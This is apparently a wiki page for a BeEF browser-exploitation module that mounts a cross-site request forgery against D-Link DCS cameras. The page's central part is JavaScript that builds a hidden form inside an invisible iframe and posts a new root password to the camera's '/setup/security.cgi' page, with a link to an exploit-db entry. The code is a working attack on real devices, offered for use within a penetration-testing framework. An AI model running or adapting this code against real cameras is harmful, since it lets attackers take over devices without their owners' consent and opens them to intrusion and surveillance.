Module: Dlink DCS series CSRF

Summary

Objective: Attempts to change the password on a Dlink DCS series camera.
Authors: bcoles
Browsers: All
Code

Internal Working

Uses an invisible iframe with POST form to change config

  var dlink_dcs_iframe = beef.dom.createInvisibleIframe();

  var form = document.createElement('form');
  form.setAttribute('action', base + "/setup/security.cgi");
  form.setAttribute('method', 'post');

  var input = null;

  input = document.createElement('input');
  input.setAttribute('type', 'hidden');
  input.setAttribute('name', 'rootpass');
  input.setAttribute('value', passwd);
  form.appendChild(input);

  input = document.createElement('input');
  input.setAttribute('type', 'hidden');
  input.setAttribute('name', 'confirm');
  input.setAttribute('value', passwd);
  form.appendChild(input);

  dlink_dcs_iframe.contentWindow.document.body.appendChild(form);

References

https://www.exploit-db.com/exploits/18509/

Feedback

User Guide

I. Introduction | II. Basic Utilization | III. Advanced Utilization | IV. Development | V. References

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Module: Dlink DCS series CSRF

Summary

Internal Working

References

Feedback

User Guide

Community

I - Starting BeEF

II - Basic Utilization

III - Advanced Utilization

IV - Development

V - References

Clone this wiki locally